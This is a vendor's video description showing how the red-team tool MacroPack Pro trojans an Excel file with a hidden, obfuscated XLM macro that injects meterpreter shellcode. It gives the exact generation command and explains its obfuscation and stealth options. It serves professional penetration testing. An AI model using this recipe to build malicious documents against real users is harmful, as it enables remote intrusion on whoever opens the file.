Redteam: Excel 4.0 XLM shellcode using MacroPack Pro

This video shows how to trojan an Excel sheet with a malicious XLM macro that injects a meterpreter shellcode.
This video was uploaded in the context of a blog post about the addition of XLM payloads to MacroPack Pro (https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro).

In the video I first open the file, then I open it again after it is trojaned with an XLM macro.

Here is the command line used to generate the payload:
echo meterx86_no0.bin | macro_pack.exe -t SHELLCODE -o --xlm --stealth -T samples\Risk_Mgt_ToolBox_v1.0.xls

The -o option is used to obfuscate the payload.
The --xlm option instructs MacroPack to use an Excel 4.0 macro instead of classic VBA.
The --stealth option hides the XLM macro sheet.
The -T option is used to trojan an existing document.

Note that the shellcode has to be generated without NULL characters.

The base XLM code is the MacroPack SHELLCODE template, which is used to inject a given raw shellcode into memory.

Note that the same payload could have been generated using a classic VBA macro instead of XLM by removing the --xlm option.

=========================================================================
MacroPack Pro is a tool for professional pentesters and redteamers.
More information is available at: https://www.balliskit.com
For any inquiry, write to emeric.nasi [at] sevagas.com using a professional email address.

You can also check the limited community open source version here: https://github.com/sevagas/macro_pack
Follow us on Twitter at: https://twitter.com/BallisKit

Video "Redteam: Excel 4.0 XLM shellcode using MacroPack Pro" from the Sevagas channel